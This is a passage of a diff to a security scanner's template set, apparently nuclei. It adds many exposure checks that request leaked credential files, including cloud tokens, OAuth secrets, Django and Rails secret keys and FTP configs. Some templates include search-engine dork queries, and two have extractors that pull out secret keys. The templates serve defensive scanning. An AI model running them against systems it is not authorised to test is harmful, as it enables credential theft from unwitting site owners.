@@ -0,0 +1,30 @@
+id: cloud-config
+
+info:
+  name: Cloud Config Yaml - File Disclosure
+  author: DhiyaneshDK
+  severity: medium
+  reference: https://www.exploit-db.com/ghdb/7959
+  metadata:
+    verified: true
+    shodan-query: html:"cloud-config.yml"
+  tags: exposure,cloud,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cloud-config.yml"
+      - "{{BaseURL}}/core-cloud-config.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'ssh_authorized_keys'
+          - '#cloud-config'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/composer-auth-json.yaml b/exposures/files/composer-auth-json.yaml
new file mode 100644
index 0000000000..8a3d0f647b
--- /dev/null
+++ b/exposures/files/composer-auth-json.yaml
@@ -0,0 +1,30 @@
+id: composer-auth-json
+
+info:
+  name: Composer-auth Json File Disclosure
+  author: DhiyaneshDK
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/5768
+  metadata:
+    verified: true
+    google-query: intext:"index of /" ".composer-auth.json"
+  tags: exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.composer-auth.json"
+      - "{{BaseURL}}/vendor/webmozart/assert/.composer-auth.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'github-oauth'
+          - 'github.com'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/credentials-json.yaml b/exposures/files/credentials-json.yaml
new file mode 100644
index 0000000000..eb12ad2559
--- /dev/null
+++ b/exposures/files/credentials-json.yaml
@@ -0,0 +1,29 @@
+id: credentials-json
+
+info:
+  name: Credentials File Disclosure
+  author: ritikchaddha
+  severity: medium
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "credentials.json"
+  tags: google,secret,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/credentials.json"
+      - "{{BaseURL}}/assets/credentials.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"client_secret":'
+          - '"client_id":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/django-secret-key.yaml b/exposures/files/django-secret-key.yaml
new file mode 100644
index 0000000000..6831eb3162
--- /dev/null
+++ b/exposures/files/django-secret-key.yaml
@@ -0,0 +1,46 @@
+id: django-secret-key
+
+info:
+  name: Django Secret Key Exposure
+  author: geeknik,DhiyaneshDk
+  severity: high
+  reference: https://docs.gitguardian.com/secrets-detection/detectors/specifics/django_secret_key
+  metadata:
+    verified: true
+    shodan-query: html:settings.py
+  tags: django,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/settings.py"
+      - "{{BaseURL}}/app/settings.py"
+      - "{{BaseURL}}/django/settings.py"
+      - "{{BaseURL}}/settings/settings.py"
+      - "{{BaseURL}}/web/settings/settings.py"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "SECRET_KEY ="
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+        negative: true
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '"DJANGO_SECRET_KEY", "(.*)"'
diff --git a/exposures/files/docker-cloud.yaml b/exposures/files/docker-cloud.yaml
new file mode 100644
index 0000000000..0258057e13
--- /dev/null
+++ b/exposures/files/docker-cloud.yaml
@@ -0,0 +1,37 @@
+id: docker-cloud
+
+info:
+  name: Docker Cloud Yaml - File Disclosure
+  author: DhiyaneshDK
+  severity: medium
+  reference: https://www.exploit-db.com/ghdb/7959
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "docker-cloud.yml"
+  tags: exposure,cloud,devops,docker
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/docker-cloud.yml"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - '(?m)^  image:'
+          - '(?m)^  ports:'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
+        condition: or
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/drupal-install.yaml b/exposures/files/drupal-install.yaml
index b681c5193f..469427dc18 100644
--- a/exposures/files/drupal-install.yaml
+++ b/exposures/files/drupal-install.yaml
@@ -4,6 +4,8 @@ info:
   name: Drupal Install
   author: NkxxkN
   severity: low
+  metadata:
+    shodan-query: http.component:"drupal"
   tags: exposure,drupal
 
 requests:
diff --git a/exposures/files/environment-rb.yaml b/exposures/files/environment-rb.yaml
new file mode 100644
index 0000000000..89c6272045
--- /dev/null
+++ b/exposures/files/environment-rb.yaml
@@ -0,0 +1,28 @@
+id: environment-rb
+
+info:
+  name: Environment Ruby File Disclosure
+  author: DhiyaneshDK
+  severity: medium
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "environment.rb"
+  tags: ruby,devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/environment.rb"
+      - "{{BaseURL}}/config/environment.rb"
+      - "{{BaseURL}}/redmine/config/environment.rb"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '# Load the Rails application.'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/ftpconfig.yaml b/exposures/files/ftpconfig.yaml
new file mode 100644
index 0000000000..a89cd41288
--- /dev/null
+++ b/exposures/files/ftpconfig.yaml
@@ -0,0 +1,29 @@
+id: ftpconfig
+
+info:
+  name: Atom remote-ssh ftpconfig Exposure
+  author: geeknik,DhiyaneshDK
+  description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials
+  severity: high
+  metadata:
+    verified: true
+    shodan-query: html:ftpconfig
+  tags: atom,ftp,config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.ftpconfig"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"protocol":'
+          - '"host":'
+          - '"user":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/gcloud-access-token.yaml b/exposures/files/gcloud-access-token.yaml
new file mode 100644
index 0000000000..7baabe35db
--- /dev/null
+++ b/exposures/files/gcloud-access-token.yaml
@@ -0,0 +1,34 @@
+id: gcloud-access-token
+
+info:
+  name: Google Cloud Access Token
+  author: DhiyaneshDK
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: html:"access_tokens.db"
+  tags: google,cloud,devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/access_tokens.db"
+      - "{{BaseURL}}/.config/gcloud/access_tokens.db"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'SQLite'
+          - 'access_token'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/gcloud-credentials.yaml b/exposures/files/gcloud-credentials.yaml
new file mode 100644
index 0000000000..e60b1a3b0a
--- /dev/null
+++ b/exposures/files/gcloud-credentials.yaml
@@ -0,0 +1,34 @@
+id: gcloud-credentials
+
+info:
+  name: Google Cloud Credentials
+  author: DhiyaneshDK
+  severity: medium
+  metadata:
+    verified: true
+    shodan-query: html:"credentials.db"
+  tags: google,cloud,devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/credentials.db"
+      - "{{BaseURL}}/.config/gcloud/credentials.db"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'SQLite'
+          - 'client_id'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - 'application/octet-stream'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/get-access-token-json.yaml b/exposures/files/get-access-token-json.yaml
new file mode 100644
index 0000000000..1a20eae184
--- /dev/null
+++ b/exposures/files/get-access-token-json.yaml
@@ -0,0 +1,29 @@
+id: get-access-token-json
+
+info:
+  name: Get Access Token Json
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "get_access_token.json"
+  tags: exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/plugins/constant-contact-forms/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json"
+      - "{{BaseURL}}/wp-content/plugins/constant-contact-api-old/vendor/constantcontact/constantcontact/test/Json/Auth/get_access_token.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"access_token":'
+          - '"token_type":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/git-mailmap.yaml b/exposures/files/git-mailmap.yaml
new file mode 100644
index 0000000000..cdc5f9b233
--- /dev/null
+++ b/exposures/files/git-mailmap.yaml
@@ -0,0 +1,38 @@
+id: git-mailmap
+
+info:
+  name: Git Mailmap File Disclosure
+  author: geeknik,DhiyaneshDK
+  severity: low
+  reference: https://man7.org/linux/man-pages/man5/gitmailmap.5.html
+  metadata:
+    verified: true
+    shodan-query: html:mailmap
+  tags: config,exposure,git,mailmap
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.mailmap"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|\"(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21\\x23-\\x5b\\x5d-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])*\")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\\x01-\\x08\\x0b\\x0c\\x0e-\\x1f\\x21-\\x5a\\x53-\\x7f]|\\\\[\\x01-\\x09\\x0b\\x0c\\x0e-\\x7f])+)\\])"
+
+      - type: word
+        part: header
+        words:
+          - "application/octet-stream"
+
+      - type: word
+        part: body
+        words:
+          - "# Theresa O'Connor:"
+        negative: true
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/glpi-telemetry-disclosure.yaml b/exposures/files/glpi-telemetry-disclosure.yaml
deleted file mode 100644
index 12428ecaf3..0000000000
--- a/exposures/files/glpi-telemetry-disclosure.yaml
+++ /dev/null
@@ -1,25 +0,0 @@
-id: glpi-telemetry-disclosure
-
-info:
-  name: GLPI Telemetry Disclosure
-  author: dogasantos
-  severity: info
-  tags: glpi,exposure
-
-requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/ajax/telemetry.php"
-      - "{{BaseURL}}/glpi/ajax/telemetry.php"
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        words:
-          - '"uuid":'
-          - '"glpi":'
-        condition: and
-
-      - type: status
-        status:
-          - 200
diff --git a/exposures/files/google-api-private-key.yaml b/exposures/files/google-api-private-key.yaml
new file mode 100644
index 0000000000..46dc4a878c
--- /dev/null
+++ b/exposures/files/google-api-private-key.yaml
@@ -0,0 +1,31 @@
+id: google-api-private-key
+
+info:
+  name: Google Api Private Key
+  author: DhiyaneshDK
+  severity: medium
+  reference: https://www.exploit-db.com/ghdb/6037
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "google-api-private-key.json"
+  tags: exposure,cloud,google,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/google-api-private-key.json"
+      - "{{BaseURL}}/app/config/pimcore/google-api-private-key.json"
+      - "{{BaseURL}}/pimcore/app/config/pimcore/google-api-private-key.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'private_key_id'
+          - 'private_key'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/google-services-json.yaml b/exposures/files/google-services-json.yaml
new file mode 100644
index 0000000000..f08e875546
--- /dev/null
+++ b/exposures/files/google-services-json.yaml
@@ -0,0 +1,31 @@
+id: google-services-json
+
+info:
+  name: Google Service Json
+  author: DhiyaneshDK
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6886
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "google-services.json"
+  tags: google,cloud,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/google-services.json"
+      - "{{BaseURL}}/app/google-services.json"
+      - "{{BaseURL}}/android/app/google-services.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'storage_bucket'
+          - 'oauth_client'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/joomla-file-listing.yaml b/exposures/files/joomla-file-listing.yaml
index ab9a61c777..055fccce2b 100644
--- a/exposures/files/joomla-file-listing.yaml
+++ b/exposures/files/joomla-file-listing.yaml
@@ -12,7 +12,7 @@ info:
     cvss-score: 5.3
     cwe-id: CWE-548
   remediation: Disable directory indexing on the /libraries/joomla/database/ directory or remove the content from the web root. If the databases can be download, rotate any credentials contained in the databases.
-  tags: exposure,joomla,listing,database
+  tags: exposure,joomla,listing,database,edb
 
 requests:
   - method: GET
diff --git a/exposures/files/jsapi-ticket-json.yaml b/exposures/files/jsapi-ticket-json.yaml
new file mode 100644
index 0000000000..b1bed180dc
--- /dev/null
+++ b/exposures/files/jsapi-ticket-json.yaml
@@ -0,0 +1,28 @@
+id: jsapi-ticket-json
+
+info:
+  name: JsAPI Ticket Json
+  author: DhiyaneshDK
+  severity: low
+  reference: https://www.exploit-db.com/ghdb/6070
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "jsapi_ticket.json"
+  tags: exposure,jsapi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/jsapi_ticket.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"expire_time":'
+          - '"jsapi_ticket":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/npm-cli-metrics-json.yaml b/exposures/files/npm-cli-metrics-json.yaml
new file mode 100644
index 0000000000..e123c11bd6
--- /dev/null
+++ b/exposures/files/npm-cli-metrics-json.yaml
@@ -0,0 +1,29 @@
+id: npm-cli-metrics-json
+
+info:
+  name: NPM Anonymous CLI Metrics Json
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: html:"anonymous-cli-metrics.json"
+  tags: npm,devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/anonymous-cli-metrics.json"
+      - "{{BaseURL}}/.npm/anonymous-cli-metrics.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"metricId"'
+          - '"metrics"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/npm-shrinkwrap-exposure.yaml b/exposures/files/npm-shrinkwrap-exposure.yaml
new file mode 100644
index 0000000000..7326634562
--- /dev/null
+++ b/exposures/files/npm-shrinkwrap-exposure.yaml
@@ -0,0 +1,32 @@
+id: npm-shrinkwrap-exposure
+
+info:
+  name: Node Shrinkwrap Exposure
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"npm-shrinkwrap.json"
+  tags: config,exposure,npm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/npm-shrinkwrap.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "version"
+          - "dependencies"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/oauth-credentials-json.yaml b/exposures/files/oauth-credentials-json.yaml
new file mode 100644
index 0000000000..4a5f39f0d2
--- /dev/null
+++ b/exposures/files/oauth-credentials-json.yaml
@@ -0,0 +1,27 @@
+id: oauth-credentials-json
+
+info:
+  name: Oauth Credentials Json
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "oauth-credentials.json"
+  tags: exposure,oauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/oauth-credentials.json"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"client_id":'
+          - '"client_secret":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/oracle-test-cgi.yaml b/exposures/files/oracle-test-cgi.yaml
new file mode 100644
index 0000000000..85761208f1
--- /dev/null
+++ b/exposures/files/oracle-test-cgi.yaml
@@ -0,0 +1,31 @@
+id: oracle-test-cgi
+
+info:
+  name: Oracle Application Server test-cgi Page
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: title:"Oracle Application Server"
+  tags: oracle,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/test-cgi"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "SERVER_SOFTWARE ="
+
+      - type: word
+        part: header
+        words:
+          - "text/plain"
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/pantheon-upstream.yaml b/exposures/files/pantheon-upstream.yaml
new file mode 100644
index 0000000000..75790fadb2
--- /dev/null
+++ b/exposures/files/pantheon-upstream.yaml
@@ -0,0 +1,27 @@
+id: pantheon-upstream
+
+info:
+  name: Pantheon upstream.yml Disclosure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "pantheon.upstream.yml"
+  tags: exposure,devops,patheon,config
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pantheon.upstream.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'database:'
+          - 'protected_web_paths:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/php-ini.yaml b/exposures/files/php-ini.yaml
new file mode 100644
index 0000000000..55d277398e
--- /dev/null
+++ b/exposures/files/php-ini.yaml
@@ -0,0 +1,32 @@
+id: php-ini
+
+info:
+  name: Php.ini File Disclosure
+  author: geeknik,DhiyaneshDK
+  severity: low
+  reference: https://www.php.net/manual/en/configuration.file.php
+  metadata:
+    verified: true
+    shodan-query: php.ini
+  tags: config,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/php.ini"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "[PHP]"
+          - "short_open_tag"
+          - "safe_mode"
+          - "expose_php"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/phpunit-result-cache-exposure.yaml b/exposures/files/phpunit-result-cache-exposure.yaml
new file mode 100644
index 0000000000..d0807e16b4
--- /dev/null
+++ b/exposures/files/phpunit-result-cache-exposure.yaml
@@ -0,0 +1,25 @@
+id: phpunit-result-cache-exposure
+
+info:
+  name: PHPUnit Result Cache File Exposure
+  author: DhiyaneshDk
+  severity: low
+  metadata:
+    verified: true
+    shodan-query: ".phpunit.result.cache"
+  tags: config,exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.phpunit.result.cache"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"defects"'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/pipeline-configuration.yaml b/exposures/files/pipeline-configuration.yaml
new file mode 100644
index 0000000000..f5749d524e
--- /dev/null
+++ b/exposures/files/pipeline-configuration.yaml
@@ -0,0 +1,27 @@
+id: pipeline-configuration
+
+info:
+  name: Pipeline Configuration Exposure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"pipeline.yaml"
+  tags: devops,exposure,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pipeline.yaml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'system:'
+          - 'project_name:'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/pipfile-lock.yaml b/exposures/files/pipfile-lock.yaml
new file mode 100644
index 0000000000..7fc0e97449
--- /dev/null
+++ b/exposures/files/pipfile-lock.yaml
@@ -0,0 +1,28 @@
+id: pipfile-lock
+
+info:
+  name: Pipfile.lock Disclosure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: html:"Pipfile"
+  tags: exposure,pip,devops,cicd
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/Pipfile.lock"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"pipfile-spec":'
+          - '"requires"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/redmine-config.yaml b/exposures/files/redmine-config.yaml
new file mode 100644
index 0000000000..91e36041a1
--- /dev/null
+++ b/exposures/files/redmine-config.yaml
@@ -0,0 +1,43 @@
+id: redmine-config
+
+info:
+  name: Redmine Configuration
+  author: DhiyaneshDK
+  severity: high
+  reference:
+    - https://www.exploit-db.com/ghdb/5803
+  metadata:
+    verified: true
+    google-query: intitle:"index of" configuration.yml
+  tags: exposure,redmine,devops,edb
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/configuration.yml"
+      - "{{BaseURL}}/config/configuration.yml"
+      - "{{BaseURL}}/redmine/config/configuration.yml"
+
+    stop-at-first-match: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "user_name"
+          - "password"
+          - "Redmine"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/redmine-settings.yaml b/exposures/files/redmine-settings.yaml
new file mode 100644
index 0000000000..87a61ceb79
--- /dev/null
+++ b/exposures/files/redmine-settings.yaml
@@ -0,0 +1,32 @@
+id: redmine-settings
+
+info:
+  name: Redmine settings.yml File Disclosure
+  author: DhiyaneshDK
+  severity: info
+  reference: https://www.exploit-db.com/ghdb/5796
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "settings.yml"
+  tags: misconfig,redmine,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/settings.yml"
+      - "{{BaseURL}}/config/settings.yml"
+      - "{{BaseURL}}/redmine/config/settings.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'format:'
+          - 'default:'
+          - 'Redmine'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/ruby-rail-storage.yaml b/exposures/files/ruby-rail-storage.yaml
new file mode 100644
index 0000000000..1292bbcb82
--- /dev/null
+++ b/exposures/files/ruby-rail-storage.yaml
@@ -0,0 +1,39 @@
+id: ruby-rail-storage
+
+info:
+  name: Ruby on Rails storage.yml File Disclosure
+  author: DhiyaneshDK
+  severity: low
+  metadata:
+    verified: true
+    google-query: intitle:"index of" storage.yml
+  tags: exposure,ruby,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/storage.yml"
+      - "{{BaseURL}}/config/storage.yml"
+      - "{{BaseURL}}/ruby/config/storage.yml"
+      - "{{BaseURL}}/railsapp/config/storage.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'service:'
+          - 'local:'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/secret-token-rb.yaml b/exposures/files/secret-token-rb.yaml
new file mode 100644
index 0000000000..8b07e9e52c
--- /dev/null
+++ b/exposures/files/secret-token-rb.yaml
@@ -0,0 +1,28 @@
+id: secret-token-rb
+
+info:
+  name: Secret Token Ruby - File Disclosure
+  author: DhiyaneshDK
+  severity: medium
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "secret_token.rb"
+  tags: redmine,devops,exposure,ruby
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/secret_token.rb"
+      - "{{BaseURL}}/config/initializers/secret_token.rb"
+      - "{BaseURL}}/redmine/config/initializers/secret_token.rb"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '::Application.config.secret'
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/secrets-file.yaml b/exposures/files/secrets-file.yaml
new file mode 100644
index 0000000000..de2d0db35c
--- /dev/null
+++ b/exposures/files/secrets-file.yaml
@@ -0,0 +1,45 @@
+id: ruby-secrets-file
+
+info:
+  name: Ruby on Rails secrets.yml File Exposure
+  author: DhiyaneshDK
+  severity: high
+  reference: https://www.exploit-db.com/ghdb/6283
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "secrets.yml"
+  tags: misconfig,cloud,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/secrets.yml"
+      - "{{BaseURL}}/config/secrets.yml"
+      - "{{BaseURL}}/test/config/secrets.yml"
+      - "{{BaseURL}}/redmine/config/secrets.yml"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - 'secret_key_base: ([a-z0-9]+)'
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+          - "text/html"
+        negative: true
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - 'secret_key_base: ([a-z0-9]+)'
diff --git a/exposures/files/sensitive-storage-exposure.yaml b/exposures/files/sensitive-storage-exposure.yaml
index 830166d274..0f21179b6c 100644
--- a/exposures/files/sensitive-storage-exposure.yaml
+++ b/exposures/files/sensitive-storage-exposure.yaml
@@ -7,7 +7,7 @@ info:
   description: Searches for sensitive keys file,logs,debugbar,app.
   reference:
     - https://www.exploit-db.com/ghdb/6304
-  tags: expose,listing,config,logs,storage
+  tags: expose,listing,config,logs,storage,edb
 
 requests:
   - method: GET
diff --git a/exposures/files/service-account-credentials.yaml b/exposures/files/service-account-credentials.yaml
new file mode 100644
index 0000000000..85aaf8638d
--- /dev/null
+++ b/exposures/files/service-account-credentials.yaml
@@ -0,0 +1,29 @@
+id: service-account-credentials
+
+info:
+  name: Service Account Credentials File Disclosure
+  author: ritikchaddha
+  severity: medium
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "service-Account-Credentials.json"
+  tags: privatekey,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/assets/other/service-account-credentials.json"
+      - "{{BaseURL}}/service-account-credentials.json"
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - '"private_key_id":'
+          - '"private_key":'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/shellscripts.yaml b/exposures/files/shellscripts.yaml
index 9ba7e828ad..b0823c55de 100644
--- a/exposures/files/shellscripts.yaml
+++ b/exposures/files/shellscripts.yaml
@@ -26,6 +26,12 @@ requests:
       - "{{BaseURL}}/wp-setup.sh"
       - "{{BaseURL}}/deploy.sh"
       - "{{BaseURL}}/aws.sh"
+      - "{{BaseURL}}/reminder.sh"
+      - "{{BaseURL}}/mysqlbackup.sh"
+      - "{{BaseURL}}/dev2local.sh"
+      - "{{BaseURL}}/local2dev.sh"
+      - "{{BaseURL}}/local2prod.sh"
+      - "{{BaseURL}}/prod2local.sh"
 
     matchers-condition: and
     matchers:
@@ -46,4 +52,4 @@ requests:
           - ".*?bin.*?sh"
           - ".*?bin.*?bash"
         part: body
-        condition: or
\ No newline at end of file
+        condition: or
diff --git a/exposures/files/styleci-yml-disclosure.yaml b/exposures/files/styleci-yml-disclosure.yaml
new file mode 100644
index 0000000000..aa9cf7fb71
--- /dev/null
+++ b/exposures/files/styleci-yml-disclosure.yaml
@@ -0,0 +1,28 @@
+id: styleci-yml-disclosure
+
+info:
+  name: StyleCi Yaml File Disclosure
+  author: DhiyaneshDk
+  severity: info
+  metadata:
+    verified: true
+    shodan-query: ".styleci.yml"
+  tags: config,exposure,devops
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/.styleci.yml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "php"
+          - "preset"
+          - "disabled"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/symfony-properties-ini.yaml b/exposures/files/symfony-properties-ini.yaml
new file mode 100644
index 0000000000..31c2ef9585
--- /dev/null
+++ b/exposures/files/symfony-properties-ini.yaml
@@ -0,0 +1,31 @@
+id: symfony-properties-ini
+
+info:
+  name: Symfony properties.ini File Disclosure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "properties.ini"
+  tags: symfony,exposure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/properties.ini'
+      - '{{BaseURL}}/config/properties.ini'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'name='
+          - 'author='
+          - 'orm='
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/exposures/files/symfony-security.yaml b/exposures/files/symfony-security.yaml
new file mode 100644
index 0000000000..83ffe89184
--- /dev/null
+++ b/exposures/files/symfony-security.yaml
@@ -0,0 +1,30 @@
+id: symfony-security
+
+info:
+  name: Symfony security.yml File Disclosure
+  author: DhiyaneshDK
+  severity: info
+  metadata:
+    verified: true
+    google-query: intitle:"index of" "security.yml"
+  tags: symfony,devops,exposure
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/security.yml"
